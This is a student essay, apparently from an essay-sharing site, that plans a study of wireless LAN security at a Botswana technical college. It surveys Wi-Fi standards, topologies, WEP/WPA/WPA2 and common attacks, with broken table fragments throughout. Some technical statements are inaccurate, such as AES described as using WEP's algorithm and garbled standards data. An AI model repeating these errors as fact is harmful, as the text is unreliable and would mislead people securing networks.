Investigating Wireless Network Security Vulnerabilities Computer Science Essay

Published: Last Edited:

This essay has been submitted by a student. This is not an example of the work written by our professional essay writers.

Some days back, approximately all government and private computer networks were limited to hard-wire connections with desktop PCs which is wired network. Although many employees had laptops, they generally connected to the Internet or to a network via modems and phone lines, which are relative easy to secure.

Today, there is explosive growth in wireless computing, both at the office and at home, and this presents completely different security problems. Wireless computing is often called Wi-Fi, which stands for Wireless Fidelity.

Wi-Fi is a technology used to connect computers and devices together. Wi-Fi give person more mobility and flexibility by allowing users (workers) to stay connected to the Internet and to the network as they roam from one coverage area to another. This increases efficiency by allowing data to be entered and accessed on site. Like their wired counterparts, wirelesses LANs are prone to security vulnerabilities.


Investigating wireless network security vulnerabilities for Wireless Local Area Network in Gaborone Technical College


Investigate wireless network security vulnerabilities in a WLAN for ICT staff room.


Outline wireless network technologies.

To describe wireless network security.

To identify wireless network security vulnerabilities, effects and risks.

To find what needs to be done to secure wireless security vulnerabilities in WLAN.


In this external project I chose to investigate on wireless security vulnerabilities, because Wireless LANs or Wi-Fi technology is a growing trend nowadays, which is transforming our lifestyles wirelessly regardless of locations. This poses no restriction and allows a great deal, more free movement on the part of the network and this exposes to different security vulnerabilities.

Investigating on the network security is more challenging hence giving me a chance to expand my wireless LAN scope and technical knowledge I acquired during my studies.

The project will be beneficial to me and others:

It will improve my wireless networking skills.

It will improve my problem solving and communications skills because; it includes researching, and interpersonal communication.

Benefit others to use as reference material in the school learning resource Center.

To accomplish this project I will have to apply and develop further the following learnt key skills and vocational units.

Information and communications technology 3- With the skills I have gained from this unit I will use it to surf the internet as I make the research and find the information that I need .It will also help me to format my document accordingly.

Wireless Networking- with the skills that I acquired from this units I will be able to investigate WLAN security vulnerability

Communications- the skills acquired from this unit will help me to interact/communicate with Administrator and discuss about the security Vulnerability (strength and weakness) in G.T.C WLAN and offer her questionnaire to answer it.

Personal and Interpersonal Skills (PIPS) - is where I learnt to interact with people and how to plan to do action plan. Devising a strategy to archive goals for the development of personal and interpersonal skills, make necessary adjustments and review progress.

Network server operating system- with all the skill that I have learnt from this unit I will be able to determine vulnerability ( strength and weakness) for WLAN in Gaborone Technical College

Problem Solving- In these units I will use the skills on how to identify the problem, evaluate and come up with the solution.


In order for me to do this investigation in a proper procedure I found it wise to come up with an action plan which will guide me through the whole investigation. The action plan is very important as it gives time frames for activities and through the action plan I will be able to know when I will start and finish a task.







Brainstorming the project title and Come up with Aims, Objective and justification of the project

Computer, A4 papers, Pen, Internet, Books

2 hours 30 minutes


Preparing action plan

Computer. Printer, A4 papers, Pen, Books

4 hours




Read and compared methods of collecting data.

choose the questionnaire, survey to be used

Computer, Printer, A4 papers, Pen, Internet


2 hours


On the old and emerging IEEE wireless LAN standards, data speed, frequency

Computer, A4 papers, Pen, Internet, Books

2 hours


How the standards of WLAN are established

Computer, Printer, A4 papers, Books

2 hours


The pros and cons of different data speeds, frequencies used in wireless networks.

Computer, Printer

A4 papers, Pen, Books

2 hours


How logical and physical network architecture differs

Computer. Printer, A4 papers, Books, Internet

1 hour 30 minutes


How, Spectrum and Radio Frequency works in wireless networks

Computer. Printer, Books, Internet

2 hours


Different security protocols

Computer, Printer, A4 papers, Pen, Books, Internet

1 hour 30 minutes


The resolutions of security protocols

Computer, Printer

A4 papers, Pen, Books, Reference

1 hour


Purposes of security protocols

Computer, A4 papers,Pen,Internet

2 hours


What is Access control and its determination in WLAN

Computer, Printer, A4 papers, Pen, Books

2 hours


What are Authentication Protocols

Computer, Printer

A4 papers, Pen, Books

1 hour 30 minutes








Types of wireless security threats

Computer. Printer

A4 papers

Pen, Internet

2 hours


How attacks are carried out and tools used

Computer. Printer

A4 papers, Pen

Reference Materials

2 hours


How to identify and prevent wireless security threats and attacks

Computer,A4 papers, Pen, Books

3 hours


The effects of security vulnerabilities in terms of data loss, corruption and improper use.

Computer, A4 papers, Pen, Books

2 hours


How to implement control measures in wireless networks

Computer. Printer

A4 papers, Books

2 hours



Compilation of collected information

Computer, Printer

A4 papers, Pen, books, Internet

6 hours



On the old and emerging IEEE wireless LAN standards, data speed, frequency in GTC WLAN

A4 papers, Pen, Books, Reference Materials

3 hours


On the pros and cons of different data speeds, frequencies used in wireless networks in GTC WLAN

A4 papers

Pen, Books, Reference Materials, Internet

3 hours


On logical and physical network architecture for GTC WLAN

A4 papers, Pen, Books, Reference Materials, Internet

3 hours


On different security protocols used in GTC WLAN

A4 papers, Pen, Reference Materials, Books

1 hour


On the effects of security vulnerabilities in GTC WLAN in terms of data loss, corruption and improper use.

A4 papers, Pen, Books, Reference Materials

3 hours


Evaluate existing wireless security policies for GTC with the latest security

Computer, A4 papers, pen, Internet

2 hours


Drawing conclusion of the project

A4 papers, Pen, Internet, Books

2 hours







Assessing whether all the process of the project have been tackled

Computer, Printer, A4 papers, Pen, Reference Materials

5 hours



Computer, Printer

A4 papers, Pen


4 hours


Write an evaluation of the report

Computer, Printer

A4 papers, Pen


2 hours


Submission of the project

Computer. Printer

A4 papers, Pen


10 minutes
















There are two types of methods of data collection, being primary research and secondary research. Primary research is the process of collecting information/study of subject through first hand observation and investigation. Secondary research involves the examination of studies of other researchers. Secondary research is when a researcher access information that is already gathered from the distributor of primary research. The information is collected through various methods such as;









Academic journals


Documentation review


Is a network of the interlinked computer networking

worldwide, which is accessible to the general public.


It reduce using so many books and too much paperwork, hence it's faster to access information and more information is available at any given time.

It is fast and reliable method of data collection.


The information from the internet can be confusing, and often specific searches turn out to be unproductive and some information may not be true.

It increases cybercrime as information posted in some websites are not supervised therefore wrong information can be posted then the researcher get it knowing that it is correct information.

The internet is incomplete to certain users as it can only be used by literate individuals.


Is a conversation in which one person (the interviewer) elicits information from

another person (the interviewee).


You get full range and depth of information you want for the interviewers.

Able to ask for more detail when needed because they will be talking face to face or talking through the phone and this will help the researcher to come up with same questions base on the research topic and more information will be gathered for the research.


It can take much time when you are waiting for the interviewer.

It can be hard to analyze and compare the information you gather from the interviewer.

It can be costly when you interviewer is outside your vocational area.


The questionnaire (also called survey) is a set of questions given to a sample of



It is inexpensive to manage and a lot of data can be obtained.

It is easy to compare and analyze and it can be administered to many people.


You might not get careful feedback from the aspirant and this will lead the evaluator not to get full answer from interviewee.

The person you are interviewing can lose the questionnaire.


This is using information that others have written to get an idea of what they have done in relation to the same topic.


It is easy and cheap to research from books.

They are easily accessible from libraries.


You might not find the information you are looking for.

You might take long time looking for the information.


DOCUMENT REVIEW is a formalized technique of data collection involving the examination of existing records or documents.


Information contained in extant documents is independently confirmable.

Document review is typically less expensive than collecting the data on your own.


Information in the documents may represent a perspective that is not aligned with the needs of assessment project.

Data in the document sources may not be exactly what you want for the needs or assessment.

Obtaining and analyzing necessary documents can be a time consuming process.


Observation defined as the visual study of something in order

to gain information.



The main strength of observation is that it provides direct access to the social phenomena under consideration. Instead of relying on some kind of self-report, such as asking people what they would do in a certain situation, you actually observe and record their behaviour in that situation [1].

Diversity, Flexibility and Applicability

Observation can take diverse forms, from informal and unstructured approaches through to tightly structured, standardised procedures, and can yield associated diverse types of data, both qualitative and quantitative. Observation, therefore, is applicable in a wide range of contexts [1].


It can influence behaviors of program participants.

It can be expensive.

It can be difficult to interpret seen behaviors.


One of the main disadvantages of observation is that it can be very time consuming and resource intensive. Observation may be a very desirable strategy to explore certain research questions, but it may simply not be feasible for the researcher with limited time and resources to carry out the observation and, therefore, alternative strategies would have to be pursued [1].


Academic journal is a peer reviewed periodical in which scholarship relating to a particular academic discipline is published.


They are permanent.

They are easily distributed (many copies are stored in different places)


The refereeing system is not perfect.

It is difficult to search.


To complete this project I will gather information on wireless network security vulnerabilities in a WLAN in GTC using different research methods like questionnaire, interview, and also research from books and internet in order to meet the aims and objectives. I chose books and internet methods of collecting data because it will be easy to find the information that I want and I can borrow any books and use the internet from the library to research about my project and also I chose interview and questionnaire because they are easy to find answers that I expect from the interviewee.



Literature review: is a survey and discussion of the works in a given area of study. It is a brief overview of what has been studied, argued, and established about a topic, and it is usually organized chronologically or thematically. It is not a summary; rather, it evaluates previous and current research in regard to how relevant and/or useful it is and how it relates to your own research [2].


Wireless is a term used to describe telecommunications in which electromagnetic waves (rather than some form of wire) carry the signal over part or the entire communication path.

Wireless networks are more flexible than wired ones, but they can also be more vulnerable to hackers or malicious software such as worms. Because wireless networks use radio waves (RF) that can pass through walls, your network's signal could go beyond the boundaries of your home.

If they are no security in the network, people with computers nearby might be able to access the information stored on your network computers and use your Internet connection to get onto the web. By setting up a security key (WEP) on your wireless network, you can help protect it from unauthorized access.

Technology is the branch of knowledge that deals with the creation and use of technical means and their interrelation with life, society, and the environment, drawing upon such engineering.


It is important to have an understanding of what wireless LAN is, this would help give an insight on how it works. There are three primary categories of organizations that guide the wireless industry. These categories include regulation, standardization, and compatibility.

The Federal Communications Commission (FCC) and the European Telecommunications Standards Institute (ETSI) are examples of regulatory bodies. The Institute of Electrical and Electronics Engineers (IEEE) is an example of a standards development organization, and the Wi-Fi Alliance is a compatibility testing and certification group.

As compared to wired LAN, Wi-Fi simply replaces cables with small, low-powered two-way radios. Instead of altering the voltage on a wire, it encrypts the zeros and ones by laying an alternating radio signal over a constant existing signal in a prearranged speed. The alternating signal encodes zeros and ones on the radio waves.

In a wireless topology, computers connect to each other using radio frequencies. Wireless technology enables connections between two or more devices wirelessly for data sharing purposes. It is wireless networking which is based on IEEE 802.11 standards. It is being used by millions of people using various devices such as personal computers, laptops, PDA's, printers, camera, IMAC, games, and Mp3 players (IPods).

Why use wireless technology?

Wireless LANs are on rapid demand and improving user's lifestyle on personal and business level and users have been quick to adopt this technology based on the following factors:

Simplified implementation and maintenance

Wireless Access Points can be placed in the ceiling or place AP where the RF signals strength will not be reduced (attenuation), where they can accommodate an almost endless variety of office/home configurations, like the image shown below:

Fig 1.0 showing AP on the Ceiling

This Access Point support Wi-Fi connection to company resources from any worker in range.

Extended Reach

Wireless LANs enable users (employees) to access company resources from any location within an Access Point's transmission range. This flexibility and convenience can directly improve users' productivity.

G:\PROJECT PICTURES\untitled.png

Fig 1.1 showing extended WLAN [3]

Increased worker mobility

The roaming benefits of wireless LANs extend across all industries and disciplines. This makes management of business logistics and personal issues easily by using various devices in different places ranging from home, warehouses, airport, lounges, and coffee shops.

Fig 1.2 showing Free Wi-Fi/Zone [4]

Free Wi-Fi/Zone (spots) are mostly found in suitable public areas like airport lounges, national libraries and coffee shops and the above shown image is displayed.

Reduced total cost of ownership and operation

The cumulative benefits of simplified implementation and maintenance, an extended Local Area Network reach, and the freedom to roam minimize expenses and improve organizational and employee productivity. The result is reduced total cost of ownership and operation.


Wireless Personal Area Network (WPAN)

It is a wireless network for interconnecting devices around an individual's workplace. The skill used in WPAN is energy resourceful example this communication can occur between devices like laptop computer and a cellphone by the use of wireless technology such as Bluetooth or infrared.

Advantages of Wireless Personal Area Network

Dynamic network setup because you can move with your workplace to another place and setup up network again.

Usually quick and relatively simple to set up because the devices are interconnecting around an individual workstation.

Disadvantages of Wireless Personal Area Network

WPAN currently limited to comparatively slow data rates when compared with WLAN technologies.

Compatibility and interoperability issues; WPAN technologies are not typically compatible with each other. Some WPAN technologies such as Bluetooth are known to have had interoperability issues between devices from different producers [5].

Wireless Local Area Network (WLAN)

It is a local area network that uses radio waves rather than wires to be integrated nodes on a network. An example of a Wireless Local Area Network may include two different buildings on the same location using some wireless distribution method typically spread-spectrum or Orthogonal Frequency Division Multiplexing radio e.g. Wi-Fi. The advantage of the Wireless Local Area Network is that you can connect to the network from any point on the coverage area of the network.

Advantages of Wireless Local Area Network

Cheaper and quicker deployment

It does not include making physical connections.

Increasing productivity

Result of researches shows that wireless technologies have a direct impact of productivity [5].

Mobility and Availability

You do not have to worry about cable length or finding the plug because is wireless, you can take your laptop no matter you go, living room but consider the coverage of the access point [5].

Disadvantages of Wireless Local Area Network

Limited number of users and lower bandwidth

Wireless transmission is lower less reliable compare to wired networks.

Less security

Wireless is more vulnerable to malicious attacks so you need to use more security.

Wireless Wide Area Network (WWAN)

It is a wireless connectivity to the internet without wires, achieved through using cellular tower technology. For example, the users of laptops use the Wireless Wide Area Network to connect to the internet. The main advantage of Wireless Wide Area Network is that it works by the process of multiplexing. Wireless Wide Area Network varies with devices. It can cover more area using satellite internet access than any type of network.

Advantages of Wireless Wide Area Network

In WWAN the message can be sent very quickly to anyone else on the network [3].

Printer can be used by more than one computer.

Disadvantages of Wireless Wide Area Network

Token-ring constraint

If a lower tier goes down all higher ties go down.

Efficiency of bandwidth is reduced with each tier [4].


There are two main topologies in wireless networks which can be configured: Peer-to-peer which is also known as ad hoc mode and Client/Server which is also known as infrastructure networking.

In an ad-hoc wireless network, two or more computers directly communicate to each other without using a central device [5]. There is no central device (hub), and these networks can be created anywhere almost impulsively.

[5]Define an Infrastructure network, as a central wireless device known as the Access Point is used to authenticate and configure wireless clients that Fall within its range. A special identifier known as the Service Set Identifier must be configured on the AP and each wireless client. The AP can further be connected to the wired LAN so that wireless clients can access the wired LAN also.


It is a mode that allows stations to communicate to each other without the use of an access point. On an ad hoc mode the stations connect together wirelessly. Ad hoc mode can be used between stand alone computers which connect through the use of Bluetooth technology.


Fig 1.3 An Ad-hoc wireless network [6]


Ad-hoc is cheaper because it does not need a router. Ad-hoc use radio frequency signals instead of access point.

Ad hoc can be useful as back up option for time being if network based on infrastructure mode and access points are malfunctioning [9].


Ad Hoc Mode connections are limited, for example between two laptops, to the power available in the laptops [10].


It is a mode that involves the use of an access point. All of the wireless traffic traverses the access point. On an infrastructure mode there is no direct access between stations, they connect to the access point. This station is build up to link to a basic service set or extended service set

F:\PROJECT PICTURES\infrastr.gif

Figure 1.4 an infrastructure wireless network [7]


If we are to compare ad hoc with infrastructure mode then infrastructure mode provides much more stability, scalability, ease of management and improved security [9].

Infrastructure mode is much better for sharing data between 3 computers or more compare to AD-hoc mode, because each computer only needs one network connection if there are 3 units, instead of 1 to connect each pair of workstations.


Infrastructure mode is expensive because it need a router or switch.

These two topologies can also be divided into other two classes namely Office and Public network. The office network that is meant to serve only authorized users, and then public network that is open to all. Public networks are nowadays increasingly being set up in different locations where people may find it convenient to send or receive e-mail, link to their office network, or simply surf the Internet example airport waiting areas, hotels, coffee shops, pubs, and national libraries.



It is a passive attack in which an attacker monitors network transmissions, evaluates packets for specific message content. Eavesdropping allows the attacker to keep his distance from the facility and leave no trace of his presence on, and listen to and gather valuable information with a directional antenna.


It is an active attack in which an attacker gains access to a server to obtain valuable data, use the organization's Internet access for malicious purposes. The process can be detected but cannot be prevented. The attacker gains access to the server wirelessly.


It is a technique that used to simply breakdown/shuts down the communications on a network. When a hacker jams a network, they use Wireless LAN equipment which use a high power RF signal generator or sweep generator that cuts of the connections of clients to the WAP.

Man in the middle

This is where a hacker uses a much high power generating access point to connect with the nodes of another access point. The users will continually send important data to the rogue access point, possibly sensitive data or important data, not knowing that it has changed.

War driving

This is when a user search for a network using vehicle, a computer which can be a laptop or PDA, a wireless Ethernet card set to work in promiscuous mode and an antenna which can be mounted on top of or positioned inside the car. Hackers can access the network when the security is not enabled on the access point.


IEEE 802.11 also referred to as Wireless Fidelity (Wi-Fi), is the standard for providing local area network (LAN) communications using radio frequencies (RF). [10]) define 802.11 standards as a number of different physical layer (PHY) technologies to be used with the 802.11 MAC. Having an understanding of these different standards can help with insight as to how IEEE 802.11 functions, and even how and why the standards have evolved the way they are. [10] Examines each of these 802.11 PHY, including the following:

802.11 Standard/ Variant

Data Speed


Transmission Type



Up to 2 Mbps

2.4 GHz

Frequency hopping PHY (FHSS) or Direct Sequencing PHY (DSSS)



Up to 54 Mbps

5 GHz UNII band

Orthogonal Frequency Division Multiplexing (OFDM) PHY.



Up to 11 Mbps

2.4 GHz ISM Band

DSSS with CCK as well as FHSS



Up to 54 Mbps

2.4 GHz ISM Band

Orthogonal Frequency Division Multiplexing (OFDM) PHY above 20Mbps

Extended rate physical (ERP) layer

DSSS with CCK below 20Mbps



Up to 2 Mbps

2.5 GHz ISM Band


Scatter net

New emerging wireless standards

New standards are established to keep up with high speed demand, and advanced security measures. Some of the recent variants are listed below but are not limited here:

802.16 WiMAX







The fundamental concept of spread spectrum radio is the use of wide frequency bandwidth than one needed by the information that is transmitted. The need for extra bandwidth in wireless is really important since it has some good benefits which include reduced vulnerability to jamming, less vulnerability to meddling, and synchronicity with narrowband transmissions.

According to [9]three physical layers were standardized in the initial revision of 802.11, which was published in 1997:

Frequency-hopping (FH) spread-spectrum radio PHY (FHSS)

Infrared light (IR) PHY( not much used or implemented recently)

Direct-sequence (DS) spread-spectrum radio PHY (DSSS)

According to [9]in 1999, two further physical layers based on radio technology were developed:

802.11a: Orthogonal Frequency Division Multiplexing (OFDM) PHY

802.11b: High-Rate Direct Sequence (HR/DS or HR/DSSS) PHY

F:\PROJECT PICTURES\figure_01.gif

Figure 1.5 An illustration of three physical layers of radio technology [12]

Frequency Hopping Spread Spectrum

FHSS is method of transferring radio signals by rapidly switching a carrier among many frequency channels by jump from one frequency to another in a random pattern, transmitting a short burst at each sub channel. Frequency Hopping Spread Spectrum was used in the original 802.11 standard and provides 1 and 2 Mbps RF communications using 2.4 GHz ISM band for clause 14 radios [17]. Frequency hopping wireless LANs, the usable portion of the 2.4 GHz ISM band is 83.5 MHz Frequency-hopping systems are the cheapest to make. Specific timing is needed to control the frequency hops, but sophisticated signal processing is not required to extract the bit stream from the radio signal.

Direct-Sequence Spread Spectrum(DS/DSSS)

Direct-Sequence Spread Spectrum is another layer for the 802.11 specifications. Direct-sequence systems spread the power out over a wider frequency band using mathematical coding functions. Two direct-sequence layers were specified. The initial specification in clause 15 standardized a 2-Mbps PHY, and 802.11b added clause 18 for the HR/DSSS PHY. Direct-sequence systems require more sophisticated signal processing, which translates into more specialized hardware and higher electrical power consumption. Direct-sequence techniques also allow a higher data rate than frequency hopping systems.

Orthogonal Frequency Division Multiplexing (OFDM)

Orthogonal Frequency Division Multiplexing (OFDM) divides an available channel into several sub channels and encodes a portion of the signal across each sub channel in parallel.Clause17, added with 802.11a, specifies the OFDM PHY.

Note: FHSS and DSSS are not modulation techniques, but methods of distributing a radio signal across bandwidth.


Network architecture describes the protocols, major hardware, and software elements that constitute the network. Network architecture, whether wireless or wired, may be viewed in two ways, logically and physically.

Network Logical Architecture

The logical architecture of a network refers to the structure of standards and protocols that enable connections to be established between physical devices, or nodes, and which control the routing and flow of data between these nodes.

The logical architecture of wireless networks is mostly described with reference to the OSI model. Standard logical architecture is the 7-layer Open System Interconnection (OSI) Reference Model, developed by the International Standards Organization (ISO). OSI specifies a complete set of network functions, grouped into layers.

Figure 1.6 showing Image showing OSI Model [17]

Figure 1.7 showing a table of summary of the OSI model



Standards and protocols

7.Application Layer

Standards that define the provision of services to applications-such as checking resource availability, authenticating users.


6.Presentation Layer

Standards to control the translation of incoming and outgoing data from one presentation format to another. It deals with compression and decompression and also encryption and decryption techniques used to prevent malicious attacks on data.


5.Session Layer

Provides the control structure for communication between applications; establishes, manages, and terminates connections (sessions) between cooperating applications.


4.Transport Layer

Provides reliable, transparent transfer of data between end points; provides end-to-end error recovery and flow control.


3.Network Layer

Standards to define the management of network connections - routing, relaying and terminating connections between nodes in the network.

IPv4, IPv6, ARP

2.Data Link Layer

Provides for the reliable transfer of information across the physical link; sends blocks (frames) with the necessary synchronization, error control, and flow control.

ARP, Ethernet, Wi-Fi, Bluetooth

1.Physical Layer

Concerned with transmission of unstructured bit stream over physical medium; deals with the mechanical, electrical, functional, and procedure.

Ethernet, Wi-Fi, Bluetooth, WiMAX

Wireless Network Physical Architecture

The physical components of a wireless network implement the Physical, Data Link, and Network Layer functions. The physical layer is divided into two sub layers: the Physical Layer Convergence Procedure (PLCP) sub layer and the Physical Medium Dependent (PMD) sub layer.

The Physical Layer Convergence Procedure (PLCP) is the glue between the frames of the MAC and the radio transmissions in the air.

The Physical Medium Dependent (PMD) defines the characteristics of, and method of transmitting and receiving, user data through a wireless medium between two or more stations.

The physical layer also incorporates a clear channel assessment (CCA) function to indicate to the MAC when a signal is detected.

Diagram showing Physical Architecture

C:\Documents and Settings\ksetabosha\My Documents\My Pictures\pics 4 wif prject\wireles1.gif

Figure 1.8 showing Diagram of Physical Architecture


If you plan to have a wireless network, you should establish it up so that only people you choose can access it. Here are a few options for wireless network security but are not limited:

Wireless networks has become important to doing business, security has become an increasingly major concern. Computer security is a rapid evolving field: in the sense that every new technology is a target for hackers, crackers, spyware, Trojans, worms, and malicious viruses. Security standards or protocols also have evolved in development to address these security issues and dates back from the inception of 802.11, which include Wired Equivalent Privacy, Wi-Fi Protected Access, WPA2 (802.1x), Wireless gateways

AES, Key Hopping and 802.11i

Wired Equivalent Privacy (WEP) Encryption Vulnerabilities

Wired Equivalent Privacy is a wireless security architecture and protocol responsible for providing authentication, confidentiality and data integrity in wireless networks. WEP is the oldest security protocol and has been discredited so thoroughly that its authentication and encryption capabilities are not considered sufficient for use in enterprise networks. [10] Shows that WEP is based on a security scheme called RC4 stream cipher that utilizes a combination of secret user keys, Key Scheduling Algorithm (KSA) and system-generated values the Pseudo Random Number Generator (PRGA). The original implementations of WEP supported so-called 40-bit encryption, having a key of length 40 bits and 24 additional bits of system-generated data (64 bits total) [10]. The WEP uses WEP keys to avoid intruders from probing traffic being transmitted between the AP and clients.

Figure 1.9 showing Wired Equivalent Privacy process [13]

When communicating wireless network equipment uses WEP keys to encrypt the data stream. The keys themselves are not sent over the network but rather are generally stored on the wireless adapter or in the Windows Registry.

Wi-Fi Protected Access (WPA)

Temporal Key Integrity Protocol (TKIP) known as Wi-Fi Protected Access (WPA) is technically a certification, not a security standard, includes only one security protocol, TKIP, and is often confused. WPA is basically a pre standard subset of 802.11i which includes the key management and the authentication architecture (802.1X) specified in 802.11i.

TKIP provides important data encryption enhancements including a per-packet key mixing function, a Message Integrity Check (MIC) named Michael, an extended initialization vector (IV) with sequencing rules, and a re-keying mechanism. Through these enhancements, TKIP addresses all WEP's known vulnerabilities.

It was designed to fix WEP vulnerabilities while operating within the constraints of existing 802.11standard equipment such as Access Points and WLAN Network Interface Card. To improve the security of 802.11 networks without requiring hardware upgrade like any other security standards it has its own flaws and was shown to be vulnerable to a packet injection exploit.


Figure 2.0 WPA encryption and integrity check process [14]

Wi-Fi Protected Access 2 (802.1X)

WPA2 technically, is a certification rather than a security standard. WPA2 includes two security standards: Temporal Key Integrity Protocol and CCMP. The 802.1X standard is designed to enhance the security of wireless local area networks (WLANs). 802.1X provides an authentication framework for wireless LANs, allowing a user to be authenticated by a central authority and uses an existing protocol, the Extensible Authentication Protocol (EAP, RFC 2284), that works on wireless LANs, for message exchange during the authentication process.

Figure 2.1 showing Wi-Fi protected Access 2(802.1x) process [15]

WPA2 can be enabled in two versions - WPA2 - Personal and WPA2 - Enterprise. WPA2 - Personal protects unauthorized network access by utilizing a set-up password. WPA2 - Enterprise verifies network users through a server. WPA2 is backward compatible with WPA.


802.11i is a standard for wireless local Networks that provides improved encryption for network that use the popular 802.11a, 802.11b which includes Wi-Fi and 802.11g standards. 802.11i improves wireless standards by providing a Robust Security Network (RSN). 802.11i standards requires new encryption key which is Temporal Key Integrity Protocols and Advanced Encryption Standard


It is a technology that uses security keys that are normally changed to avoid intruders from breaking the encryption. The network always changes hop from one key to another as often as every 3 seconds. The keys for encryption are updated before any reuse occurs and before enough amounts of determined conditions can be observed.

AES (Advanced Encryption Standard)

It is the process that is active by the 802.11i standard used in user authentication and encryption protocols. The AES has high performance and it uses the algorithm for encryption (WEP). The AES algorithm is capable of using cryptographic keys of 128 bit, 192bit, and 256 bit to encrypt and decrypt data in blocks of 128 bits.


It is a device that permits a computer and other Internet-enabled devices to access the Internet connection. The wireless gateway provides functions of a router, access point and a firewall. The wireless replaces two devices with one (which are the router and the access point). The wireless gateway is commonly used on a wired WAN or between wireless LANs.


Open System Authentication Vulnerabilities

Open System Authentication is a process whereby there is no verification of identity. With Open System Authentication, a computer equipped with a wireless modem can access any WEP network and receive files that are not encrypted.

For Open System Authentication to work, the Service Set Identifier of the computer should match the Service Set Identifier of the wireless access point. The Service Set Identifier is a sequence of characters that uniquely names a Wireless Local Area Network.

A figure 2.2 showing Open system two-step authentication process [16]

Open system authentication involves a two-step authentication process:

The client transmits a confirmation frame with the code indicating that Open System authentication should be used.

The access point receives the authentication frame and then responds with acknowledgement frame.

An authentication frame is then sent to the client machine which will then respond an acknowledgement frame to the access point.

Shared key Authentication Vulnerabilities

Plaintext Challenge

Ciphertext Response

Key Stream




Plaintext Challenge

Ciphertext Response

Eavesdropper (Listening)

Shared Key Authentication is a process by which a computer can gain access to a wireless network that uses the Wired Equivalent Privacy protocol and [11] define Shared Key Authentication as a Share Key Authentication requires the clients to use a pre-shared WEP key to encrypt challenge text sent from AP. With shared key authentication, a computer fitted out with a wireless modem can fully access any WEP network and exchange encrypted or unencrypted data.


AP 30619007-2-140-0

A figure 2.3 showing Shared Key Authentication process

Shared Key Authentication Process:

For shared key authentication to function, a WEP encryption key, obtained in advance by the connecting computer, must match a key stored at the wireless access point.

The client sends an authentication request to the Access Point.

The Access Point randomly generates a challenge and sends it to the client.

The client transmits confirmation frame with the code indicating that Shared Key authentication should be used and the AP then transmits the Acknowledgement frame to the client with a challenging text for the client to confirm.

The client sends an acknowledgment frame to the AP with the challenging text and then the AP receives the challenge response confirmation frame from the client and transmits an Acknowledgement frame to the client.

The access point compares the information from the client with the original and the sends the acknowledgement frame to the client. If they are identical, the client passes the authentication. If not, the authentication fails.